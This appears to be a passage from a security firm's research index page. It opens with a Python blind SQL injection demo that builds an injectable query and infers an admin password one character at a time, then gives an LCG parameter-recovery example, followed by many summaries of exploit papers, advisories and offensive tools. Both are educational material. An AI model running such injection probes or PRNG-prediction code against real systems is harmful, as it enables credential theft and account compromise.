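    def __init__(self, db):
        self.db = db
        self.queries = 0          # request counter, to show the cost

    def user_exists(self, name):
        self.queries += 1
        sql = f"SELECT 1 FROM users WHERE name = '{name}'"   # injectable
        return self.db.execute(sql).fetchone() is not None


def infer_length(oracle, user, max_len=64):
    """Ask 'is the password n characters long?' for n = 1..max_len.
    The trailing '-- ' comments out the closing quote the application adds."""
    for n in range(1, max_len + 1):
        if oracle.user_exists(f"{user}' AND length(password) = {n} -- "):
            return n
    return None


def infer_char(oracle, user, pos, lo=32, hi=126):
    """Binary-search the printable-ASCII code of character `pos` (1-based).
    Invariant: the true code lies in [lo, hi]; seven questions at most."""
    while lo < hi:
        mid = (lo + hi) // 2
        probe = f"{user}' AND unicode(substr(password, {pos}, 1)) > {mid} -- "
        if oracle.user_exists(probe):
            lo = mid + 1          # code is above mid
        else:
            hi = mid              # code is at or below mid
    return chr(lo)


def infer_password(oracle, user="admin"):
    """Full inference attack: length first, then one character at a time."""
    length = infer_length(oracle, user)
    if length is None:
        return None
    return "".join(infer_char(oracle, user, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    oracle = Oracle(make_db())
    secret = infer_password(oracle)
    print(secret, "recovered in", oracle.queries, "requests")
```

Nine characters cost nine length probes plus six or seven comparisons each, so the whole secret comes back in roughly seventy requests; an in-band UNION would need one, an out-of-band channel would need none on the response path, which is exactly why inference is the class left to an attacker when the other two are blocked.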


The Pharming Guide – Understanding and preventing DNS related attacks by phishers

Exploiting well-known flaws in DNS services and the way in which host names are resolved to IP addresses, phishers have upped the ante in the cyber war for control of a customer’s online identity for financial gain. A group of attack vectors now referred to as “Pharming” affects the fundamental…


Weak Randomness Part I – Linear Congruential Random Number Generators

The objective of this series of papers is to describe the mathematical properties of some of the more common pseudo-random sequence generators and to show how they can be attacked by illustrating the principles with real-world bugs. The series demonstrates how weak randomness can be identified, used to compromise real-world systems, and defended against.…
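As an added worked example (code written for this page, not from the paper): with the modulus known and the full state visible in the output, three consecutive outputs of x_{n+1} = (a·x_n + c) mod m are enough to recover a and c and predict every later value. The constants a = 1103515245, c = 12345, m = 2^31 are the textbook ANSI C values, used here purely as a constructed target; real generators that emit only some bits of the state need the lattice techniques of the later parts, not this one.

```python
"""Recovering the parameters of a full-state LCG from observed outputs.

Added example for this page. The generator constants and seed are constructed.
"""
from math import gcd


class LCG:
    """x_{n+1} = (a * x_n + c) mod m, with the full state returned as output."""

    def __init__(self, a, c, m, seed):
        self.a, self.c, self.m, self.state = a, c, m, seed % m

    def next(self):
        self.state = (self.a * self.state + self.c) % self.m
        return self.state


def recover_params(outputs, m):
    """Recover (a, c) from consecutive full-state outputs and a known modulus.

    From x1 = a*x0 + c and x2 = a*x1 + c (mod m):
        x2 - x1 = a * (x1 - x0)   =>   a = (x2 - x1) * (x1 - x0)^-1 mod m
        c = x1 - a*x0 mod m
    The inverse exists only when gcd(x1 - x0, m) == 1, so slide over the
    sample until a usable triple appears, then check against everything seen.
    """
    for i in range(len(outputs) - 2):
        x0, x1, x2 = outputs[i:i + 3]
        d = (x1 - x0) % m
        if gcd(d, m) != 1:
            continue                      # this triple is not invertible
        a = ((x2 - x1) * pow(d, -1, m)) % m
        c = (x1 - a * x0) % m
        if all((a * outputs[j] + c) % m == outputs[j + 1]
               for j in range(len(outputs) - 1)):
            return a, c
    return None


def predict_next(outputs, m):
    """Predict the value that follows the observed sequence, or None."""
    params = recover_params(outputs, m)
    if params is None:
        return None
    a, c = params
    return (a * outputs[-1] + c) % m


if __name__ == "__main__":
    victim = LCG(1103515245, 12345, 2 ** 31, seed=20240101)
    seen = [victim.next() for _ in range(4)]
    print("recovered a, c:", recover_params(seen, 2 ** 31))
    print("prediction:", predict_next(seen, 2 ** 31), "actual:", victim.next())
```

The verification step matters: with a composite modulus a triple can satisfy the two equations by coincidence, and only the check against the whole observed run turns a candidate into a confirmed state.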


Exploiting PL/SQL Injection Flaws with only CREATE SESSION Privileges

When exploiting PL/SQL injection flaws in SELECT/UPDATE/INSERT/DELETE statements it has long been known that if an attacker can create their own function, and inject this, then it is possible for them to execute arbitrary PL/SQL code – for example EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’. Of course, if the attacker can’t create their own…


Blind Exploitation of Stack Overflow Vulnerabilities

This paper presents a number of technical discussion points relating to the potential for exploiting stack overflow vulnerabilities without having direct access to the application which is to be exploited. The points raised in this paper discuss the key issues which would need to be overcome in order to do this, as well…


Slotting Security into Corporate Development

Technology trail-blazing organisations such as large financial institutions have been working to secure their custom applications for several years, but the second-tier “technology following” organisations have been too slow to follow. This is now rapidly changing due to recent bad press following many highly publicised security compromises. In many of…


Creating Arbitrary Shellcode In Unicode Expanded Strings

The paper is intended to be read by the portion of the security community responsible for creating protective mechanisms to guard against “shellcode” type security flaws; the intention is to remove the perception that Unicode buffer overflows are non exploitable and thereby improve the general state of network security. It…


Violating Database – Enforced Security Mechanisms

This paper discusses the feasibility of violating the access control, authentication and audit mechanisms of a running process in the Windows server operating systems. Specifically, it discusses the feasibility of totally disabling application – enforced access control in a running service, taking SQL Server 2000 as a sizeable and meaningful…


Hacking the Extensible Firmware Interface

Agenda: The role of the BIOS; Attacking a legacy BIOS; Limitations of the legacy BIOS; Introduction to the EFI environment; Attacking the EFI environment; UEFI, summary and conclusions. Some caveats: this talk is about rootkit persistence and how to deploy a rootkit from the BIOS/EFI; it is not concerned with what…


Advanced Exploitation of Oracle PL/SQL Flaws

Objectives: Discuss the current “threat landscape”; Introduce a new class of vulnerability; Introduce a new method of attack; Show practical demonstrations; Look at some defences. Download presentation. Author: David Litchfield


Firmware Rootkits: The Threat to the Enterprise

Agenda: Recap of ACPI BIOS rootkit and limitations; Brief overview of the PCI Bus; Abusing expansion ROMs; Abusing PXE; Detection, Prevention and the TPM; Summary and conclusions. Download presentation. Author: John Heasman


Database Security: A Christmas Carol

The Past, Present and Future of Database Security. In 2006 there were 335 publicized data breaches in the U.S. So far in 2007 there have been 276. With the 5th anniversary of the SQL Slammer worm drawing near, now is as good a time as any to look back on…


Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server

This paper presents several methods of bypassing the protection mechanism built into Microsoft’s Windows 2003 Server that attempts to prevent the exploitation of stack based buffer overflows. Recommendations about how to thwart these attacks are made where appropriate. Microsoft is committed to security. I’ve been playing with Microsoft products, as…


Non-flood/non-volumetric Distributed Denial of Service (DDoS)

Over the last two decades, both Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks have been growing in frequency, complexity and volume. Traditionally, these attacks are associated with botnets and large amounts of traffic aimed at disrupting Internet-facing services. However, while the goal of these attacks remains…


VoIP Security Methodology and Results

VoIP Security Issues The issues brought up in VoIP security and throughout this presentation are not new and are not a surprise. Telephony experience and IP experience combined with a security focused mindset are enough to combat these issues. There is a lot of public coverage of VoIP issues, however…


E-mail Spoofing and CDONTS.NEWMAIL

Many IIS web servers running ASP applications will use the CDONTS.NEWMAIL object to provide the functionality for feedback or contact forms. This paper will examine how the CDONTS.NEWMAIL object can be used by attackers to send arbitrary e-mails via the vulnerable web server and what must be done to prevent an online ASP…


Dangling Cursor Snarfing: A New Class of Attack in Oracle

In Oracle, a failure to close cursors created and used by DBMS_SQL or a failure to clean up open cursors in the event of an exception can lead to a security hole. If the cursor in question has been created by higher privileged code and left hanging then it’s possible for a low…


Database Servers on Windows XP and the unintended consequences of simple file sharing

This paper presents some unexpected consequences of running database servers on Windows XP with Simple File Sharing enabled. In the real world, this kind of setup would typically be a developer’s system and as it turns out, in some cases depending on the database software, you might not just be sharing your files…


DNS Pinning and Web Proxies

DNS-based attacks can be used to perform a partial breach of browser same origin restrictions in some situations, enabling a malicious web site to perform two-way interaction with a different domain. The attacks that are normally conceived against browser-based DNS pinning are capable of being resolved through additional safeguards within…


Technical advisory: CVE-2017-8592 – XMLHttpRequest in IE followed 307 redirections with additional or customised headers

Vendor: Microsoft Vendor URL: https://www.microsoft.com/ Versions affected: IE 10, 11, and Edge prior to July 2017 patch Systems Affected: Windows with above versions affected Author: Soroush Dalili Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592 Risk: Low Summary Internet Explorer (or Edge) could be used to send arbitrary messages to a target…


Which database is more secure? Oracle vs. Microsoft

This paper will examine the differences between the security posture of Microsoft’s SQL Server and Oracle’s RDBMS based upon flaws reported by external security researchers and since fixed by the vendor in question. Only flaws affecting the database server software itself have been considered in compiling this data so issues that affect, for example,…


Variations in Exploit methods between Linux and Windows

This paper will examine the differences and commonality in the way a vulnerability common to both Windows and Linux is exploited on each system. The Vulnerability: The vulnerability that will be discussed in this paper is a classic stack based overflow in Oracle’s RDBMS 9.2.0.1. As well as offering the standard SQL service,…


Using graph databases to assess the security of thingernets based on the thingabilities and thingertivity of things

“Security within the Internet of Things (IoT) is currently below par.” The statement above derives from many observations across our work in IoT (and that of the wider security research community) in addition to a myriad of regular, publicly reported issues and security concerns with IoT devices and their infrastructures.…


Beyond data loss prevention

Data Loss Prevention (DLP) is a security control aimed at highlighting when sensitive data leaves the corporate network or is accessed without authorisation. A DLP solution can be a great asset to a business and support a range of security goals and compliance. It can be an invaluable safety net…


How to protect yourself & your organisation from phishing attacks

With one click, his entire business was in the hands of someone else. Sensitive company information, bank account details, social media profiles, various other usernames and passwords. All stolen by a cyber criminal in a convincing phishing attempt. The email he’d received looked legitimate. It was just a simple request…


Rise of the machines: Machine Learning & its cyber security applications

“By far the greatest danger of Artificial Intelligence is that people conclude too early that they understand it.” (Eliezer Yudkowsky) At NCC Group, we are researching Machine Learning (ML) and Artificial Intelligence (AI) from a number of different angles in order to fully understand the pros and cons of ML…


Latest threats to the connected car & intelligent transport ecosystem

The modern vehicle has become increasingly computerised as the demand for cleaner emissions and better transport safety for drivers and pedestrians has grown. Numerous initiatives are currently underway to begin to address this threat and to bring the principles used within traditional enterprise environments (such as the Secure Development Lifecycle)…


Understanding the insider threat & how to mitigate it

It is a widely held belief that the vast majority of threats to businesses are from outside attackers, with the stereotypical view of hackers trying to make money through crime.  The problem with this viewpoint is that it does not consider the threat from a malicious insider. There is a…


Matty McMattface: Security implications, mitigations & testing strategies for biometric facial recognition systems

Biometric facial recognition is becoming an increasingly popular mechanism for authenticating users in online and mobile environments. In addition, it is continually being adopted for physical access control, whether at border controls such as airports or within secure facilities to enforce strict access control (and/or time and attendance tracking) to…


Encryption at rest: Not the panacea to data protection

Following from our recent CISO research council, our research team have put together this whitepaper, which explores encryption at rest. Encryption at rest is not a panacea to data protection due to its complexity and the utility of data. Often, misconceptions can (and do) arise whereby it is believed that…


Applying normalised compression distance for architecture classification

An NCC Group whitepaper. When working with malware research and black box penetration testing, it is not always clear what data you are working on and in order to disassemble binaries properly, one needs to know the architecture that the binary has been…


D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow

Title: D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow
Reference: VT-95
Discoverer: …


Unauthenticated XML eXternal Entity (XXE) vulnerability

Vendor: Oracle Vendor URL: http://www.oracle.com/  Versions affected: 11.1.2.4 (previous versions may also be affected) Systems Affected: Oracle Hyperion Financial Reporting Web Studio Author: Mathew Nash Mathew.Nash[at]nccgroup[dot]trust, Fabio Pires Fabio.pires[at]nccgroup[dot]trust Advisory URL: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html  CVE Identifier: CVE-2017-10310 Risk: High (Unauthenticated local file read, server-side request forgery or denial of service) Summary The…


Technical Advisory: Shell Injection in MacVim mvim URI Handler

Vendor: macvim-dev Vendor URL: http://macvim.org Versions affected: snapshot-110 Author: Daniel Crowley <daniel.crowley[at]nccgroup[dot]trust> Bug discovery credit: Anonymous Advisory URL / CVE Identifier: TBD Risk: Critical Summary MacVim is a Mac OS port of Vim. MacVim is vulnerable to shell injection in mvim:// URIs through the column parameter, allowing attacks through a…


Technical Advisory: Shell Injection in SourceTree

Vendor: Atlassian Vendor URL: http://atlassian.com Versions affected: v1.9.8 known affected version, earlier versions possible Systems Affected: Mac OS X known affected, others possible Author: Daniel Crowley <daniel.crowley[at]nccgroup[dot]trust> Advisory URL / CVE Identifier: https://jira.atlassian.com/browse/SRCTREE-4481 Risk: Critical (reliable remote code execution) Summary SourceTree is a product for working with various types of…


Technical Advisory: Multiple Vulnerabilities in Accellion File Transfer Appliance

Vendor: Accellion, Inc. Vendor URL: http://www.accellion.com/ Versions affected: FTA_9_12_40, FTA_9_12_51, FTA_9_12_110, others likely Systems Affected: Accellion File Transfer Appliance Author: Daniel Crowley <daniel.crowley[at]nccgroup[dot]trust> Advisory URL / CVE Identifier: TBD Risk: Critical Summary The Accellion File Transfer Appliance (FTA) is an alternative to traditional email and FTP services for file transfers.…


Mergers & Acquisitions (M&A) cyber security due diligence

An NCC Group whitepaper. Regardless of the size, scope, geography or sector of your organisation, there are common elements that should be considered when it comes to cyber security due diligence during the M&A process. This whitepaper aims to cover the risks, opportunities and responsibilities associated with cyber security…


Advisory-CraigSBlackie-CVE-2016-9795

Title: Privilege Escalation in CA Common Services casrvc due to Arbitrary Write
Reference: VT-37
Discoverer: …


Best practices with BYOD

In today’s modern society the requirement for employees to be based within a corporate office is minimal, largely due to remote working gaining prominence. The cost to provide remote working or mobile technology to employees can, however, be expensive. An ideal solution to this cost issue is enabling the employee…


Technical Advisory: Nexpose Hard‐coded Java Key Store Passphrase Allows Decryption of Stored Credentials

Vendor: Rapid7, Inc.
Vendor URL: http://rapid7.com
Versions affected: 6.4.9 2016-11-30 and potentially all prior releases.
Systems Affected: Nexpose Vulnerability Scanner
Author: Noah Beddome, Justin Lemay, and Ben Lincoln
Advisory URL / CVE Identifier: 2017-5230
Risk: Medium - Requires specific access criteria
Summary: The Nexpose vulnerability scanner by Rapid7 is widely used to identify network and application…


Java RMI Registry.bind() Unvalidated Deserialization

Title: Java RMI Registry.bind() Unvalidated Deserialization
Reference: VT-87
Discoverer: Nick Bloor (@NickstaDB)
Vendor: …


Understanding cyber risk management vs uncertainty with confidence in 2017

Every organisation faces uncertainty and this is often a key challenge in achieving its objectives. Much of this uncertainty comes from an inability to accurately predict future events. Generally, we can define a potential future event that could affect an organisation’s objectives as a ‘risk’ and the process of forecasting…


iOS MobileSlideShow USB Image Class arbitrary code execution.txt

Title: iOS MobileSlideShow USB Image Class arbitrary code execution
Release Date: 15 December 2016
Reference: NCC00249
Discoverer: Andy Davis
Vendor: …


Denial of Service in Parsing a URL by ierutil.dll

Title: Denial of Service in Parsing a URL by ierutil.dll
Reference: VT-20
Discoverer: Soroush Dalili
Vendor: …


U plug, we play

These slides are from David Middlehurst’s presentation at the BSides Manchester conference. The presentation includes information on a new open source tool called ‘UPnP Pentest Toolkit’. Download Presentation


SSL checklist for pentesters

These slides are from Jerome Smith’s presentation at BSides MCR 2014. It tackles the subject of SSL/TLS testing from the viewpoint of a penetration tester. It is a practical guide, broad in scope, focusing on pitfalls and how to check issues manually (as much as possible). Download presentation


Dissecting social engineering attacks

These slides are from Robert Ray’s presentation at the Trust Forum in Edinburgh. The presentation looks at the common social engineering tactics and provides hints and tips on how to detect, prevent and respond to a social engineering attack. Download presentation


External Enumeration and Exploitation of Email and Web Security Solutions

Ben Williams, security consultant at NCC Group, presented his talk, External Enumeration and Exploitation of Email and Web Security Solutions at Black Hat USA. He also produced two whitepapers which include statistical analysis of the filtering products, services and policies used by some of the world’s top companies. Download presentation…


Social Engineering

These slides are from Panagiotis Gkatziroulis’ presentation at the Trust Forum in London. It looks at the common social engineering methods, tools and mitigation involved in social engineering attacks. Download presentation


Phishing Stories

These slides are from Shaun Jones’ presentation at the Trust Forum in Manchester. He gave examples of real-life phishing attacks and provided tips on how you can protect yourself. Download presentation


Automating extraction from malware and recent campaign analysis

These slides are from David Cannings’ presentation at the 44CON Breakfast Briefing. The talk is titled Automating extraction from malware and recent campaign analysis, and includes an overview of some recent targeted campaigns. Download presentation


DDoS Common Approaches and Failings

This webinar looks at the reasons that DDoS mitigation may not be working and what you should be thinking about to protect your business from a DDoS attack, including examples of some testing we have done and common approaches. Download presentation


Absolute Security

These slides are from Rory McCune’s presentation at the Trust Forum in Edinburgh. In his presentation he looked at how everything from celebrity hacking to the Heartbleed bug can be explained by a lack of context, and what you can do to avoid the trap of absolute security. Download presentation


How much training should staff have on cyber security?

These slides are from Irene Michlin’s presentation at the Trust Forum in London. It looked at how much training staff should have on cyber security. Download presentation


USB under the bonnet: Implications of USB security vulnerabilities in vehicle systems

Andy Davis, research director at NCC Group, delivered this presentation at the escar Embedded Security in Cars Conference in Hamburg. His talk focused on how USB security affects embedded systems within vehicles. It covered an overview of USB basics and some classic examples of where vulnerabilities have been previously identified.…


Cyber Essentials Scheme

These slides are from Matt Storey’s presentation at the Trust Forum in Manchester. He discussed what Cyber Essentials is, who it is for and the benefits it has to your organisation. Download presentation


Webinar – PCI Version 3.0: Are you ready?

This webinar talked through the changes to the new PCI SSC version 3.0 standard in detail and how they will affect your business, the things you need to be thinking about now and the timescales in which you have to react to the changes. Download our presentation Download the presentation…


Webinar: 4 Secrets to a Robust Incident Response Plan

David Cannings, Principal Consultant at NCC Group, delivered a fantastic webinar on four key considerations when building a robust incident response plan. The webinar covered: an introduction (why a plan is needed); what the risks are; four key considerations; case studies for each consideration; more resources on incident response…


Cloud Security Presentation

These slides are from David FB.Page presentation at the Manchester Trust Forum. The presentation includes information on cloud security and how the different types of cloud implementations could affect your organisation’s security. Download presentation


Webinar: SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities

These slides were presented as part of the SMACK, SKIP-TLS & FREAK SSL/TLS vulnerabilities webinar series. Our Technical Director, Ollie Whitehouse, covered: a high level overview of the threat; the impact of the threat; what is affected/impacted by it; details on how the exploitation works; details on Man in the Middle; how to…


Revealing Embedded Fingerprints: Deriving intelligence from USB stack interactions

These slides come from Andy Davis’ presentation at Black Hat USA 2013. Andy’s presentation covers the topic of using techniques to analyse USB stack interactions to provide information such as the OS running on the embedded device, the USB drivers installed…


Memory Gap

A memory searching utility across multiple processes, which: opens each process; works out the valid memory pages; searches for the ASCII and Unicode incarnations of the string. To download the tool, visit our GitHub page here.


44Con2013Game

The NCC Group Game from 44CON 2013 – a knowledge based multiple choice game for conferences.  For more information and to download the game, visit our GitHub page here. 


creep-web-app-scanner

A primitive website scanner currently under development by an NCC Group employee and University graduate with 20% research time. creep currently crawls a site, and searches for potentially interesting information within each page. creep will crawl your (HTTP only) target and pull interesting info on the site, including: Source code…


ncccodenavi

NCC Code Navi, the Text Viewer and Searcher for Code Reviewers, which allows: easily searching across code; having multiple instances of the same file / search queries open concurrently; an inbuilt note keeper; sending different aspects of filenames, paths and code to the note keeper easily; selecting a word or…


Pip3line

Raw bytes manipulation utility, able to apply well known and less well-known transformations. For more information and to download the tool, visit our GitHub page here. 


typofinder

A web service written in Python designed to identify registered yet mistyped DNS domains. This utility will check if web server, mobile and mail handling DNS records have also been registered. In addition, geo IP is used to locate the country in which the registered IPv4 and IPv6 addresses are present…


DIBF – Updated

This tool encompasses two distinct features. It guesses the IOCTL values that the driver accepts and also their valid size limitations, and stores the results in a file for future reuse. The second feature is comprised of 3 dumb fuzzers: a pure random fuzzer, a sliding DWORD fuzzer and…


IODIDE

IODIDE – The IOS Debugger and Integrated Disassembler Environment. Released as open source by NCC Group Plc. Developed by Andy Davis, andy dot davis at nccgroup dot com. To download visit: https://github.com/nccgroup/IODIDE. Released under AGPL, see LICENSE for more information. Includes the PowerPC disassembler from cxmon by Christian Bauer, Marc…


CECSTeR

CECSTeR is the Consumer Electronics Control Security Testing Resource – a GUI-based tool to perform security testing against the HDMI CEC (Consumer Electronics Control) and HEC (HDMI Ethernet Channel) protocols.  For more information and to download the tool visit our GitHub page here.


cisco-SNMP-enumeration

Cisco SNMP enumeration, brute force, config downloader and password cracking script. For more information and to download the tool, visit our GitHub page here.


dotnetpaddingoracle

Small script to check if a .NET web application is vulnerable to a padding oracle. This script actually verifies that the oracle is present and exploitable, not just whether the patch has been installed. For more information and to download the tool, visit our GitHub page here.


dotnetpefuzzing

NCC Code Navi the Text Viewer and Searcher for Code Reviewers. For more information and to download the tool, visit our GitHub page here. 


easyda

This tool is an Easy Windows Domain Access Script which finds common password hashes on Windows networks (pass the hash), and locates logged in Domain Administrator accounts. For more information and to download the tool, visit our GitHub page here.


EDIDFuzzer

A tool for fuzzing Enhanced Display Identification Data, developed by Andy Davis. For more information and to download the tool visit our GitHub page here.


Fat-Finger

Fat-Finger extends the original finger.nse and attempts to enumerate current logged on users through a full match of the username and a partial match of the GECOS field in /etc/passwd.  For more information and to download the tool, visit our GitHub page here. 


firstexecution

firstexecution is a collection of different ways to execute code outside of the expected entry points.  For more information and to download the tool, visit our GitHub page here. 


grepify

Grepify the GUI Regex Text Scanner for Code Reviewers.  For more information and to download the tool, visit our GitHub page here.


FrisbeeLite

FrisbeeLite is a GUI-based USB device fuzzer, developed by Andy Davis.  For more information and to download the tool, visit our GitHub page here.


State-of-the-art email risk

Email was not designed to be used the way it is today. Organisations rely on email for daily business communication and while most are protecting against low-level threats, more sophisticated email-based attacks are on the rise. This NCC Group whitepaper highlights the overall risks that organisations face when using email…


Ransomware: what organisations can do to survive

We’ve published a short eBook based on our experience of dealing with numerous ransomware cases in the last few years. The eBook is designed to provide real-world advice as to what organisations should do to minimise the likelihood of initial infection as well as limit any impact should that fail.…


hostresolver

A Windows application to help out with external infrastructure scans that can be used for the following: convert a file of IP addresses to hostnames (output a straight list of hostnames or a comma separated list of IP Address, Hostname); convert a file of hostnames to IP addresses (output a straight…


lapith

Lapith is a Python GUI tool that presents Nessus results in a format more useful for penetration testers. Results can be viewed by issue as opposed to by host. It is therefore easier to report all the hosts affected by an issue, rather than all of the issues affecting the…


metasploitavevasion

Metasploit payload generator that avoids most Anti-Virus products. For more information and to download the tool, visit our GitHub page here.


Maritime Cyber Security: Threats and Opportunities

This presentation about maritime cyber security, delivered at the CIRM Annual Meeting in Cyprus, looks at the cyber threats to the maritime industry, an overview of the attack surface, the impact of some of the risks they face and a look at what solutions are available in the short, medium…


IP-reputation-snort-rule-generator

A tool to generate Snort rules or Cisco IDS signatures based on public IP/domain reputation data.  For more information and to download the tool, visit our GitHub page here.


The L4m3ne55 of Passw0rds: Notes from the field

This presentation about the “lameness of passwords” was delivered by Ben Williams, senior security consultant at NCC Group, at the 44Con Café event at the IP Expo in Manchester. Williams talked about his experience of breaking into networks and applications with a variety of password attack tools and techniques. It…


Mature Security Testing Framework

These slides are from Matt Storey’s presentation at the Edinburgh Trust Forum. This presentation looks at security testing frameworks, the scheduling aspects of the various forms of testing and other options, such as using STAR or red team assessments to test gaps in IT security controls. Download presentation


Exporting non-exportable RSA keys

These slides are from Jason Geffner’s presentation “Exporting Non-Exportable RSA Keys” that he presented at Black Hat Europe in 2011. In this presentation Jason will cover security issues surrounding RSA keys and Digital Certificates. Download presentation To read the white paper that accompanies these slides click here.


Black Hat USA 2015 presentation: Broadcasting your attack-DAB security

This presentation was presented at Black Hat USA 2015. Digital Audio Broadcasting (DAB) radio receivers can be found in many new cars and are often integrated into what has become known as the “infotainment system” – typically a large screen in the dashboard that…


The role of security research in improving cyber security

These slides are from a presentation, “The Role of Security Research in Improving Cyber Security” by Andy Davis. The presentation discusses the role of security research in helping to improve cyber security.  Download presentation


Self-Driving Cars- The future is now…

Matt Lewis, associate director at NCC Group presented a talk at the Oredev conference in Sweden on how self-driving cars is no longer science fiction. Investment is already being made into this area and commercially available vehicles will be available in the next decade. Matt’s talk discusses the possibilities and…


They Ought to Know Better: Exploiting Security Gateways via their Web Interfaces

These slides are from Ben Williams’ presentation “They ought to know better: Exploiting Security Gateways via their Web Interfaces”, that he presented at Black Hat Europe in 2012. In this presentation Ben will discuss the 40+ exploits that have been discovered and ways that some of these can be used…


Mobile apps and security by design

In this presentation Ollie Whitehouse will be discussing How to develop or purchase COTS mobile apps for my enterprise while ensuring security.  Download presentation


The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet

These slides come from Alex Stamos and Tom Ritter’s presentation, “The Myth of Twelve More Bytes: Security on the Post-Scarcity Internet” from Black Hat USA in 2012. In this presentation they will cover the new changes to the internet’s infrastructure and the concerns around this. Download presentation


When Security Gets in the Way: PenTesting Mobile Apps That Use Certificate Pinning

These slides come from Justine Osborne and Alban Diquet’s presentation from Black Hat USA 2012. In this presentation they will explain what certificate pinning is and how it works in the iOS and Android systems. Download Presentation


USB Undermining Security Barriers: further adventures with USB

These slides come from Andy Davis’ presentation from Black Hat USA in 2011. In this presentation Andy will discuss some of the security vulnerabilities around using USB and the impact these vulnerabilities could have on your organisation. Download Presentation. There is also a white paper on this subject, you can…


Software Security Austerity Security Debt in Modern Software Development

These slides come from Ollie Whitehouse’s presentation “Software Security Austerity Security Debt in Modern Software Development” that he gave at 44Con in 2012. In this presentation Ollie will explain software security debt and ways that this debt can be managed. Download presentation


RSA Conference – Mobile Threat War Room

These slides are from Ollie Whitehouse’s presentation from the 2012 RSA Conference, eFraud Global Forum in London. In this presentation Ollie will discuss some of the big trends in mobile security from 2012, providing some technical details and real world examples, and then he will give his predictions for threats…


Finding the weak link in binaries

These slides are from Ollie Whitehouse’s presentation from Hack in the Box in Kuala Lumpur. In the presentation Ollie will discuss the What, Why and How of discovering weak links in binaries. Download presentation


To dock or not to dock, that is the question: Using laptop docking stations as hardware-based attack platforms

These slides come from Andy Davis’ presentation from BlackHat Europe 2013. In this presentation he will explain why docking stations are an attractive target for an attacker, how they can be attacked and discuss ways to detect and prevent such attacks.  Download Presentation You can also read the white paper…


Harnessing GPUs Building Better Browser Based Botnets

These slides come from Marc Blanchou’s presentation at Black Hat Europe, Harnessing GPUs: Building Better Browser Based Botnets. In the presentation Marc discusses harnessing GPUs with browser-based botnets for distributed and cheaper cracking, and considers botnet impact, cost, stealth requirements and portability when building better browser based botnets.…


The Browser Hacker’s Handbook

Author: Wade Alcorn, Christian Frichot, Michele Orru
Michele Orru, from the Group’s Fort Consult Division, has co-authored The Browser Hacker’s Handbook with former NCC Group security consultant Wade Alcorn. The book gives a practical understanding of hacking the everyday web browser. It contains expert advice on topics such as ARP spoofing,…


SQL Server Security

Author: Bill Grindlay, David Litchfield
Bill Grindlay, principal software architect at NCC Group, has co-authored SQL Server Security. The book provides in-depth coverage of the installation, administration, and programming of secure Microsoft SQL Server environments and applications. It covers some of the latest techniques such as Installing and configuring…


The Database Hacker’s Handbook

Author: David Litchfield, Chris Anley, John Heasman, Bill Grindlay
NCC Group’s Bill Grindlay, principal software architect, and Chris Anley, chief technical scientist, have co-authored The Database Hacker’s Handbook. The book helps readers to understand how to break into and defend the seven most popular database servers. It contains expert advice…


Social Engineering Penetration Testing

Author: Gavin Watson, Richard Ackroyd, Andrew Mason
Gavin Watson and Richard Ackroyd, security engineers at RandomStorm, part of NCC Group, have co-authored a book with former RandomStorm engineer Andrew Mason. The book includes information on practical methodology and everything you need to plan and execute a social engineering penetration test…


Peeling back the layers on defence in depth…knowing your onions

Peeling back the layers on defence in depth…knowing your onions – an NCC Group whitepaper
Is your organisation fully prepared for malicious attacks from both motivated external attackers and internal threat actors? As the threat landscape continues to evolve it is vital that organisations understand where the threats are and how…


End-of-life pragmatism

End-of-life pragmatism – an NCC Group whitepaper
Does your organisation have a robust IT Refresh Policy in place? One of the main concerns relating to the replacement of IT infrastructure is the cost. The risk of introducing compatibility issues and, ultimately, downtime also causes anxiety. However, exploitation of vulnerabilities in…


Microsoft Office Memory Corruption Vulnerability

Vulnerability Summary
Title: Microsoft Office Memory Corruption Vulnerability
Release Date: 10 March 2016
Reference: NCC00886
Discoverer: Richard Warren
Vendor: Microsoft
Vendor Reference: MS16-029
Systems Affected: Tested on Microsoft Office 2010 on Windows 7
CVE Reference: CVE-2016-0021
Risk: Medium
Status: Fixed
Download technical advisory


Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode

Vulnerability Summary
Title: Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode
Release Date: 10 March 2016
Reference: …


Elephant in the Boardroom Survey 2016

UK plc wants tougher cyber regulation and more punishment for failings
71% of UK board directors want companies to be penalised for failing to meet basic cyber security requirements, according to new research from global cyber security and risk mitigation expert NCC Group. In what appears to be a sea…


Flash local-with-filesystem Bypass in navigateToURL

Title: Flash local-with-filesystem Bypass in navigateToURL
Reference: VT-19
Discoverer: Soroush Dalili and Matthew Evans
Vendor: …


D-Link routers vulnerable to Remote Code Execution (RCE)

Title: D-Link routers vulnerable to Remote Code Execution (RCE)
Release Date: 11 Aug 2016
Reference: …


iOS Application Security: The Definitive Guide for Hackers and Developers

Author: David Thiel
This book is the definitive guide for hackers and developers, allowing readers to understand and eliminate security holes in iOS applications. Former NCC Group security consultant, David Thiel, authored this book, which includes information about common iOS coding mistakes that create serious security problems and how…


The Mobile Application Hacker’s Handbook

Author: Dominic Chell, Tyrone Erasmus, Shaun Colley, Ollie Whitehouse
Ollie Whitehouse, technical director at NCC Group, has co-authored The Mobile Application Hacker’s Handbook. The book helps readers to understand how to secure mobile phones by approaching the issue from a hacker’s point of view. It contains expert guidance on topics…


Research Insights Volume 9 – Modern Security Vulnerability Discovery

NCC Group’s latest Research Insights paper provides a view on modern vulnerability discovery approaches. The identification of vulnerabilities and understanding what is involved in their exploitation has numerous applications in both the attack and defence side of cyber security. The way in which software vulnerabilities are discovered has evolved considerably over…


Post-quantum cryptography overview

Organisations that need to keep long-term secrets, or which are designing systems that will be in use for ten or more years, need to plan for a post-quantum-computing world. This whitepaper gives a short introduction and overview of post-quantum cryptography. We discuss why post-quantum crypto is needed and provide handles…


The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd Edition

